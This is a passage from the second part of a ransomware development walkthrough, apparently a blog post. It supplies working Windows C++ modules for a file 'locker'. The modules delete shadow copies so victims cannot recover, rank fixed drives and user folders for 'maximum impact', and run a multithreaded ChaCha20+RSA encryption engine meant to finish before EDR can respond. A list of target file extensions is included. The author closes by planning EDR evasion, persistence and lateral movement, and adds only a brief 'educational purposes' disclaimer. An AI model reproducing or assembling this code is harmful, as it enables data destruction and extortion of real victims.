FALSE, // Non-forced for legitimacy

&deletedSnapshots,

&nonDeletedSnapshotsId

);

if (SUCCEEDED(hr) && deletedSnapshots > 0) {

successCount++;

}

}

// Variable inter-batch delay to simulate human-like timing

if (batchEnd < snapshotIds.size()) {

Sleep(10 + (GetTickCount64() % 40)); // 10-50ms random delay

}

}

success = successCount > 0;

}

C++:

// Comprehensive resource cleanup with exception safety

try {

// VSS operations performed here

}

catch (…) {

// Silent exception handling for operational security

success = false;

}

// Guaranteed cleanup regardless of success or failure

if (pEnum) {

pEnum->Release();

}

if (pVss) {

pVss->Release();

}

CoUninitialize();

return success;V. Drive Enumeration and System Preparation: The DriveUtils Module

The drive enumeration & system preparation module handles local storage discovery, drive prioritization and intelligent path filtering for optimal encryption targeting. We basically impliment some algorithms for identifying and prioritizing storage devices while maintaining system stability through careful exclusion of critical system directories. The implementation demonstrates how modern lockers balance comprehensive coverage with operational safety, ensuring maximum impact on user data while preserving system functionality necessary for victim interaction.

Drive enumeration (walking) begins with comprehensive discovery of all accessible storage devices using the Windows API’s logical drive detection mechanisms. The encryptor systematically queries the system for all available drive letters, then filters for fixed drives that are most likely to contain valuable user data. This approach ensures complete coverage of local storage while avoiding unreliable or temporary storage types such as network drives, removable and virtual drives that may not be consistently accessible.

C++:

std::vector<std::wstring> GetFixedDrives() {

std::vector<std::wstring> drives;

DWORD driveMask = GetLogicalDrives();

for (wchar_t drive = L’A’; drive <= L’Z’; drive++) {

if (driveMask & (1 << (drive - L’A’))) {

const std::wstring rootPath = std::wstring(1, drive) + L”:\\”;

UINT driveType = GetDriveTypeW(rootPath.c_str());

// Only include fixed drives (skip removable, network, etc.)

if (driveType == DRIVE_FIXED) {

// Verify accessibility before adding to processing list

WIN32_FIND_DATAW findData;

WCHAR searchPath[MAX_PATH];

wcscpy_s(searchPath, MAX_PATH, rootPath.c_str());

wcscat_s(searchPath, MAX_PATH, L”*”);

HANDLE hFind = FindFirstFileW(searchPath, &findData);

if (hFind != INVALID_HANDLE_VALUE) {

FindClose(hFind);

drives.push_back(rootPath);

}

}

}

}

return drives;

}Drive prioritization also implements intelligent sorting algorithms that optimize encryption order based on available free space characteristics. Our encryptor also prioritizes drives with larger amounts of free space first, operating under the assumption that drives with more available space are likely to contain larger collections of user data. This prioritization strategy maximizes the impact of encryption operations by targeting the most data-rich storage devices during the critical early phases of encryption. It's a standard presumptive technique:

C++:

// drive prioritization based on free space analysis

std::vector<std::wstring> PrioritizeDrives(const std::vector<std::wstring>& drives) {

// Create a modifiable copy for sorting operations

std::vector<std::wstring> prioritizedDrives = drives;

// Sort drives by free space (largest free space first)

std::sort(prioritizedDrives.begin(), prioritizedDrives.end(),

[](const std::wstring& a, const std::wstring& b) {

ULONGLONG spaceA = GetDriveFreeSpace(a.c_str());

ULONGLONG spaceB = GetDriveFreeSpace(b.c_str());

return spaceA > spaceB;

});

// system drive deferral

WCHAR systemDrive[MAX_PATH];

if (GetWindowsDirectoryW(systemDrive, MAX_PATH) > 0) {

std::wstring sysDrive(1, systemDrive[0]);

sysDrive += L”:\\”;

auto it = std::find(prioritizedDrives.begin(), prioritizedDrives.end(), sysDrive);

if (it != prioritizedDrives.end()) {

prioritizedDrives.erase(it);

prioritizedDrives.push_back(sysDrive); // Process system drive last

}

}

return prioritizedDrives;

}Free space calculation utilizes the GetDiskFreeSpaceExW() API to obtain accurate disk space information that accounts for user quotas and file system limitations. This approach provides more reliable space calculations than simple file enumeration methods, enabling more accurate drive prioritization decisions based on actual available storage capacity.

C++:

// free space calculation with quota awareness

ULONGLONG GetDriveFreeSpace(const WCHAR* drivePath) {

ULARGE_INTEGER freeBytesAvailable;

ULARGE_INTEGER totalBytes;

ULARGE_INTEGER totalFreeBytes;

if (GetDiskFreeSpaceExW(

drivePath,

&freeBytesAvailable,

&totalBytes,

&totalFreeBytes)) {

return freeBytesAvailable.QuadPart;

}

return 0; // Return zero if space calculation fails

}

C++:

BOOL ShouldExcludePath(const WCHAR* path) {

// skip critical any system directories that could compromise system stability

if (wcsstr(path, L”\\Windows\\”) ||

wcsstr(path, L”\\Program Files\\”) ||

wcsstr(path, L”\\Program Files (x86)\\”) ||

wcsstr(path, L”\\ProgramData\\”) ||

wcsstr(path, L”\\$Recycle.Bin\\”) ||

wcsstr(path, L”\\System Volume Information\\”)) {

return TRUE;

}

return FALSE;

}This approach to drive enumeration and prioritization demonstrates the type of planning and methodical walking required for effective locker operations. By implementing prioritization features and exclusion mechanisms the module ensures a pretty wide coverage of valuable data while maintaining the system stability necessary for successful operations.

VI. Concurrency & Parallel Processing: Improving the Worker Thread Model

The threadpool represents the computational engine that enables higher performance parallel encryption operations across multiple processor cores and large file collections. Our concurrency system implements a producer-consumer pattern with threadsafe queue management, dynamic load balancing and graceful cleanup. The threadpool demonstrates how modern lockers leverage multi core processors to achieve faster encryption speeds that can encrypt thousands of files in minutes, often completing before any EDR can detect and respond to the process.

The threadpool initialization process establishes the foundational infrastructure for parallel processing operations. The implementation dynamically allocates thread handle arrays based on the optimal thread count determined by system hardware analysis, ensuring efficient memory usage across diverse hardware configurations. Critical section objects and semaphore synchronization primitives are initialized to provide thread-safe access to shared resources, preventing race conditions and data corruption that could compromise encryption operations or system stability.

C++:

BOOL ThreadPool_Initialize(PTHREADPOOL_INFO threadPool, DWORD threadCount) {

// allocate thread handles based on system capabilities

threadPool->hThreads = (HANDLE*)malloc(sizeof(HANDLE) * threadCount);

if (!threadPool->hThreads) {

return FALSE;

}

threadPool->threadsCount = threadCount;

threadPool->running = TRUE;

// Initialize the work queue with linked list structure

threadPool->queue.head = NULL;

threadPool->queue.tail = NULL;

threadPool->queue.count = 0;

// Set synchronization primitives for thread safety

InitializeCriticalSection(&threadPool->queue.cs);

threadPool->queue.semaphore = CreateSemaphore(NULL, 0, 10000, NULL);

if (!threadPool->queue.semaphore) {

free(threadPool->hThreads);

DeleteCriticalSection(&threadPool->queue.cs);

return FALSE;

}

return TRUE;

}Thread creation and startup procedures implement robust error handling and resource management to ensure consistent threadpool operation across diverse system configurations. Each worker thread receives a unique index parameter that can be used for thread-specific operations or debugging, while comprehensive cleanup procedures handle partial initialization failures that could leave the system in an inconsistent state.

C++:

BOOL ThreadPool_Start(PTHREADPOOL_INFO threadPool, LPTHREAD_START_ROUTINE threadProc) {

for (DWORD i = 0; i < threadPool->threadsCount; i++) {

threadPool->hThreads[i] = CreateThread(

NULL, // Default security attributes

0, // Default stack size

threadProc, // Thread function

(LPVOID)(intptr_t)i,// Thread index as parameter

0, // Default creation flags

NULL // Don't receive thread identifier

);

if (threadPool->hThreads[i] == NULL) {

// Failed to create thread, clean up previously created threads

for (DWORD j = 0; j < i; j++) {

CloseHandle(threadPool->hThreads[j]);

}

free(threadPool->hThreads);

threadPool->hThreads = NULL;

DeleteCriticalSection(&threadPool->queue.cs);

CloseHandle(threadPool->queue.semaphore);

return FALSE;

}

}

return TRUE;

}

C++:

// Threadsafe work item enqueue with optimal performance

VOID ThreadPool_Enqueue(PTHREADPOOL_INFO threadPool, PWORK_ITEM workItem) {

EnterCriticalSection(&threadPool->queue.cs);

// Set next pointer to NULL as this will be the last item

workItem->next = NULL;

if (threadPool->queue.count == 0) {

// Empty queue, set both head and tail

threadPool->queue.head = workItem;

threadPool->queue.tail = workItem;

}

else {

// Add to the end of the list for FIFO processing

threadPool->queue.tail->next = workItem;

threadPool->queue.tail = workItem;

}

threadPool->queue.count++;

LeaveCriticalSection(&threadPool->queue.cs);

// Signal worker threads that work is available

ReleaseSemaphore(threadPool->queue.semaphore, 1, NULL);

}

C++:

PWORK_ITEM ThreadPool_Dequeue(PTHREADPOOL_INFO threadPool) {

PWORK_ITEM workItem = NULL;

EnterCriticalSection(&threadPool->queue.cs);

if (threadPool->queue.count > 0) {

// Get the item at the head for FIFO processing

workItem = threadPool->queue.head;

// Move head to next item

threadPool->queue.head = workItem->next;

// If queue is now empty, update tail as well

if (threadPool->queue.head == NULL) {

threadPool->queue.tail = NULL;

}

threadPool->queue.count—;

}

LeaveCriticalSection(&threadPool->queue.cs);

return workItem;

}

C++:

DWORD ThreadPool_GetQueueCount(PTHREADPOOL_INFO threadPool) {

DWORD count;

EnterCriticalSection(&threadPool->queue.cs);

count = threadPool->queue.count;

LeaveCriticalSection(&threadPool->queue.cs);

return count;

}

C++:

VOID ThreadPool_Shutdown(PTHREADPOOL_INFO threadPool, DWORD timeoutMs) {

// Signal thread termination

threadPool->running = FALSE;

// Wake all waiting worker threads

for (DWORD i = 0; i < threadPool->threadsCount; i++) {

ReleaseSemaphore(threadPool->queue.semaphore, 1, NULL);

}

// Wait for threads to exit with timeout protection

WaitForMultipleObjects(threadPool->threadsCount, threadPool->hThreads, TRUE, timeoutMs);

}

VOID ThreadPool_Cleanup(PTHREADPOOL_INFO threadPool) {

// Close all thread handles

for (DWORD i = 0; i < threadPool->threadsCount; i++) {

CloseHandle(threadPool->hThreads[i]);

}

// Clean up remaining work items to prevent memory leaks

PWORK_ITEM item = threadPool->queue.head;

while (item) {

PWORK_ITEM next = item->next;

if (item->fileInfo) {

if (item->fileInfo->fileHandle != INVALID_HANDLE_VALUE) {

CloseHandle(item->fileInfo->fileHandle);

}

free(item->fileInfo);

}

free(item);

item = next;

}

free(threadPool->hThreads); // free allocated resources

DeleteCriticalSection(&threadPool->queue.cs);

CloseHandle(threadPool->queue.semaphore);

// Reset structure to prevent accidental reuse

ZeroMemory(threadPool, sizeof(THREADPOOL_INFO));

}VII. Upgrading the Encryption Engine: A Better Local ChaCha20 + RSA Implementation

The core encryption engine represents the evolution from our single directory implementation in Part 1 to a multi drive, multithreaded encryption system capable of processing entire local systems efficiently. Building upon the foundational ChaCha20 + RSA hybrid cryptography established previously, our next implementation will integrate seamlessly with the threadpool, drive enumeration, and system preparation modules to create a comprehensive encryption platform. The engine demonstrates how individual components combine to form a cohesive system that can rapidly encrypt thousands of files across multiple drives while maintaining cryptographic security and operational stealth, and how these can and be and are leveraged for unsavoury purposes…

Unlike the single directory approach from Part 1, this implementation operates as a producer consumer system where file discovery processes feed work items into a shared threadpool queue, enabling parallel processing across multiple drives simultaneously. The integration with the drive enumeration module allows the encryption engine to process prioritized drive lists, while the threadpool architecture ensures optimal resource utilization across diverse hardware configurations. This modular design enables the encryption engine to scale from single directory operations to enterprise wide deployment scenarios.

The worker thread implementation serves as the core processing unit that consumes work items from the threadpool queue and performs the actual file encryption operations. Each worker thread operates independently, processing files in parallel while sharing cryptographic contexts and system resources efficiently. The implementation includes sophisticated error handling, timeout mechanisms, and resource management to ensure stable operation even when processing thousands of files simultaneously.

C++:

//worker thread &integrated error handling

DWORD WINAPI WorkerThreadProc(LPVOID lpParameter) {

int threadIndex = (int)(intptr_t)lpParameter;

// Allocate buffer for file operations - optimized for header encryption

LPBYTE buffer = (LPBYTE)VirtualAlloc(NULL, HEADER_ENCRYPT_SIZE, MEM_COMMIT, PAGE_READWRITE);

if (!buffer) {

return 1;

}

// Maximum processing time per file (2 minutes for large files)

const DWORD MAX_FILE_PROCESSING_TIME = 120 * 1000;

DWORD errorCount = 0;

while (g_threadPool.running) {

// Wait for work items with timeout to prevent indefinite blocking

DWORD waitResult = WaitForSingleObject(g_threadPool.queue.semaphore, 1000);

if (waitResult == WAIT_TIMEOUT) {

continue; // Check running status and retry

}

if (!g_threadPool.running) {

break; // Graceful shutdown initiated

}

PWORK_ITEM workItem = ThreadPool_Dequeue(&g_threadPool);

if (workItem) {

BOOL success = FALSE;

DWORD startTime = GetTickCount();

//process file with comprehensive exception handling

__try {

success = OpenFileForEncryptionWithLongPathSupport(workItem->fileInfo);

if (success) {

success = GenerateEncryptionKey(workItem->cryptoProvider, workItem->publicKey, workItem->fileInfo);

if (success) {

success = WriteEncryptHeader(workItem->fileInfo) &&

EncryptFileHeader(workItem->fileInfo, buffer);

}

}

}

__except (EXCEPTION_EXECUTE_HANDLER) {

success = FALSE;

errorCount++;

// Adaptive error handling to prevent system thrashing

if (errorCount > 20) {

Sleep(50);

errorCount = 0;

}

}

// Timeout protection for problematic files

DWORD elapsedTime = GetTickCount() - startTime;

BOOL timedOut = (elapsedTime >= MAX_FILE_PROCESSING_TIME);

// Finalize successful operations

if (success && !timedOut) {

if (workItem->fileInfo->fileHandle != INVALID_HANDLE_VALUE) {

CloseHandle(workItem->fileInfo->fileHandle);

workItem->fileInfo->fileHandle = INVALID_HANDLE_VALUE;

}

ChangeFileName(workItem->fileInfo->filename);

}

// Cleanup resources

if (workItem->fileInfo->fileHandle != INVALID_HANDLE_VALUE) {

CloseHandle(workItem->fileInfo->fileHandle);

}

free(workItem->fileInfo);

free(workItem);

}

}

if (buffer) {

VirtualFree(buffer, 0, MEM_RELEASE);

}

return 0;

}

C++:

// Advanced multi-drive file discovery with intelligent prioritization

void FindAndEncryptFiles(const WCHAR* startPath, HCRYPTPROV cryptoProvider, HCRYPTKEY publicKey) {

// Stack-based traversal structure for efficient directory processing

typedef struct {

WCHAR path[MAX_PATH_LEN];

int depth;

} DIR_ENTRY;

DIR_ENTRY* dirStack = (DIR_ENTRY*)malloc(sizeof(DIR_ENTRY) * 5000);

if (!dirStack) return;

int stackSize = 0;

DWORD processedFiles = 0;

DWORD errorFiles = 0;

const int MAX_DEPTH = 32;

// Prioritize user directories for maximum impact

const WCHAR* userDirs[] = {

L”\\Users\\”,

L”\\Documents and Settings\\”

};

// Extract drive letter for user directory prioritization

WCHAR driveLetter[4] = { 0 };

if (startPath[0] != L’\0’ && startPath[1] == L’:’ && startPath[2] == L’\\’) {

driveLetter[0] = startPath[0];

driveLetter[1] = startPath[1];

driveLetter[2] = startPath[2];

driveLetter[3] = L’\0’;

}

// add prioritized user directories first

for (int i = 0; i < sizeof(userDirs) / sizeof(userDirs[0]); i++) {

WCHAR userPath[MAX_PATH_LEN];

wcscpy_s(userPath, MAX_PATH_LEN, driveLetter);

wcscat_s(userPath, MAX_PATH_LEN, userDirs[i]);

DWORD attrs = GetFileAttributesW(userPath);

if (attrs != INVALID_FILE_ATTRIBUTES && (attrs & FILE_ATTRIBUTE_DIRECTORY)) {

wcscpy_s(dirStack[stackSize].path, MAX_PATH_LEN, userPath);

dirStack[stackSize].depth = 1;

stackSize++;

}

}

// add root directory for comprehensive coverage

wcscpy_s(dirStack[stackSize].path, MAX_PATH_LEN, startPath);

dirStack[stackSize].depth = 0;

stackSize++;

}

C++:

// Extended path support for comprehensive file coverage

BOOL OpenFileForEncryptionWithLongPathSupport(PFILE_INFO fileInfo) {

for (int attempt = 0; attempt < 5; attempt++) {

// Remove read-only attributes that could prevent encryption

DWORD attributes = GetFileAttributesW(fileInfo->filename);

if (attributes != INVALID_FILE_ATTRIBUTES && (attributes & FILE_ATTRIBUTE_READONLY)) {

SetFileAttributesW(fileInfo->filename, attributes & ~FILE_ATTRIBUTE_READONLY);

}

// Detect and handle long paths automatically

BOOL isLongPath = (wcslen(fileInfo->filename) >= 4 &&

wcsncmp(fileInfo->filename, L"\\\\?\\", 4) == 0);

fileInfo->fileHandle = CreateFileW(

fileInfo->filename,

GENERIC_READ | GENERIC_WRITE,

0, // Exclusive access for encryption

NULL,

OPEN_EXISTING,

FILE_FLAG_SEQUENTIAL_SCAN,

NULL

);

if (fileInfo->fileHandle != INVALID_HANDLE_VALUE) {

break; // Successfully opened

}

DWORD error = GetLastError();

// Handle sharing violations with retry logic

if (error == ERROR_SHARING_VIOLATION || error == ERROR_LOCK_VIOLATION) {

Sleep(100);

continue;

}

// Convert to extended path format for long paths

if (error == ERROR_PATH_NOT_FOUND && !isLongPath) {

WCHAR extendedPath[MAX_PATH_LEN];

wcscpy_s(extendedPath, MAX_PATH_LEN, L"\\\\?\\");

wcscat_s(extendedPath, MAX_PATH_LEN, fileInfo->filename);

wcscpy_s(fileInfo->filename, MAX_PATH_LEN, extendedPath);

continue;

}

return FALSE;

}

// Validate file accessibility and size

if (fileInfo->fileHandle == INVALID_HANDLE_VALUE) {

return FALSE;

}

LARGE_INTEGER fileSize;

if (!GetFileSizeEx(fileInfo->fileHandle, &fileSize) || fileSize.QuadPart == 0) {

CloseHandle(fileInfo->fileHandle);

fileInfo->fileHandle = INVALID_HANDLE_VALUE;

return FALSE;

}

fileInfo->fileSize = fileSize.QuadPart;

return TRUE;

}

C++:

// Hardcoded RSA public key

const BYTE g_hardcodedPublicKey[] = {

0x06, 0x02, 0x00, 0x00, 0x00, 0xA4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31,

0x00, 0x08, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x71, 0xA7, 0xB5, 0x87,

// … (truncated for brevity)

};

// Optimized crypto initialization with hardcoded keys

BOOL InitializeCrypto(HCRYPTPROV* cryptoProvider, HCRYPTKEY* publicKey) {

// Acquire cryptographic provider with enhanced security

if (!CryptAcquireContextW(cryptoProvider, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {

if (!CryptAcquireContextW(cryptoProvider, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL, CRYPT_NEWKEYSET)) {

return FALSE;

}

}

// Import hardcoded public key for consistent encryption

if (!CryptImportKey(*cryptoProvider, g_hardcodedPublicKey, g_hardcodedPublicKeySize, 0, 0, publicKey)) {

CryptReleaseContext(*cryptoProvider, 0);

return FALSE;

}

return TRUE;

}

// key generation with RSA protection

BOOL GenerateEncryptionKey(HCRYPTPROV provider, HCRYPTKEY publicKey, PFILE_INFO fileInfo) {

// Generate cryptographically secure random keys

if (!CryptGenRandom(provider, KEY_SIZE, fileInfo->chachaKey) ||

!CryptGenRandom(provider, IV_SIZE, fileInfo->chachaIV)) {

return FALSE;

}

// Initialize ChaCha20 context with generated keys

memset(&fileInfo->cryptCtx, 0, sizeof(fileInfo->cryptCtx));

chacha_keysetup(&fileInfo->cryptCtx, fileInfo->chachaKey, 256);

chacha_ivsetup(&fileInfo->cryptCtx, fileInfo->chachaIV);

// Prepare key+IV package for RSA encryption

memcpy(fileInfo->encryptedKey, fileInfo->chachaKey, KEY_SIZE);

memcpy(fileInfo->encryptedKey + KEY_SIZE, fileInfo->chachaIV, IV_SIZE);

ZeroMemory(fileInfo->encryptedKey + KEY_SIZE + IV_SIZE, ENCRYPTED_KEY_SIZE - (KEY_SIZE + IV_SIZE));

// Encrypt key package with RSA public key

DWORD dwDataLen = KEY_SIZE + IV_SIZE;

return CryptEncrypt(publicKey, 0, TRUE, 0, fileInfo->encryptedKey, &dwDataLen, ENCRYPTED_KEY_SIZE);

}

C++:

// header-only encryption

BOOL EncryptFileHeader(PFILE_INFO fileInfo, LPBYTE buffer) {

// Calculate optimal encryption size for maximum impact

LONGLONG bytesToEncrypt = min(HEADER_ENCRYPT_SIZE, fileInfo->fileSize);

// Position at file beginning for header encryption

LARGE_INTEGER offset;

offset.QuadPart = 0;

if (!SetFilePointerEx(fileInfo->fileHandle, offset, NULL, FILE_BEGIN)) {

return FALSE;

}

// Read header data for encryption

DWORD bytesRead = 0;

if (!ReadFile(fileInfo->fileHandle, buffer, (DWORD)bytesToEncrypt, &bytesRead, NULL) || bytesRead == 0) {

return FALSE;

}

// Apply ChaCha20 stream encryption to header

chacha_encrypt(&fileInfo->cryptCtx, buffer, buffer, bytesRead);

// Write encrypted header back to file

offset.QuadPart = 0;

if (!SetFilePointerEx(fileInfo->fileHandle, offset, NULL, FILE_BEGIN)) {

return FALSE;

}

return WriteFullData(fileInfo->fileHandle, buffer, bytesRead);

}



const WCHAR* g_targetExtensions[] = {

L”.doc”,

L”.docx”,

L”.xls”,

L”.xlsx”,

L”.ppt”,

L”.pptx”,

L”.pdf”,

L”.zip”,

L”.rar”,

L”.7z”,

L”.mp3”,

L”.mp4”,

L”.jpg”,

L”.jpeg”,

L”.png”,

L”.gif”,

L”.txt”,

L”.csv”,

L”.sql”,

L”.mdb”,

L”.accdb”,

L”.psd”,

L”.ai”,

L”.svg”,

L”.db”,

L”.sqlite”,

L”.sqlite3”,

L”.sqlitedb”,

L”.vdi”,

L”.vhd”,

L”.vmdk”,

L”.pvm”,

L”.vmem”,

L”.vmx”

};

BOOL IsTargetExtension(const WCHAR* filename) {

const WCHAR* extension = wcsrchr(filename, L’.’);

if (!extension) return FALSE;

for (size_t i = 0; i < sizeof(g_targetExtensions) / sizeof(g_targetExtensions[0]); i++) {

if (_wcsicmp(extension, g_targetExtensions[i]) == 0) {

return TRUE;

}

}

return FALSE;

}

VIII. Conclusion

In this second part of the walkthrough we expanded the encryption engine into a more robust and modular local file locker framework designed specifically for Windows environments. By decoupling core responsibilities into their own components, such as recursive drive enumeration utilities, multithreaded task scheduling, encryption core logic with ChaCha20 and RSA2048, and shadow copy management, we established a solid foundation that balances throughput and maintainability.

Upon compiling and running this demonstration you will find that the implemented threadpool enhances the scalability of the encryptor, enabling efficient parallel processing of large file sets across multiple directories while maintaining minimal system impact. The drive enumeration module systematically discovers target files recursively, feeding the encryption system with dynamically generated workloads, which ensures broad and flexible coverage of the filesystem. Meanwhile, the shadow copy deletion module addresses an essential pre-encryption operation, neutralizing a common recovery mechanism and thereby increasing the overall effectiveness of the locker.

Together, these modular components demonstrate how to build a more comprehensive local encryption engine that can serve as a basis for more complex functionality in future walkthroughs, making it straightforward to integrate additional capabilities such as advanced EDR evasion, runtime obfuscation, process injection, and network propagation. Looking forward, perhaps we will explore some stealth techniques, including better compile-time code obfuscation and userland antihooking, to evade modern endpoint detection and response systems. Network propagation and persistence mechanisms will also be considered to transform this local encryptor into a fully featured locker capable of lateral movement and sustained presence. For now, this foundational framework exemplifies best practices for balancing speed, stealth, and stability in file encryptor development at the local encryption level.

Again, this walkthrough is intended solely for educational purposes. The encryption demonstration provided is free and open source, and must not be resold or reused for any other purposes. Also be careful not to encrypt your own files; use a sandbox or VM.

Thanks for reading

- Remy
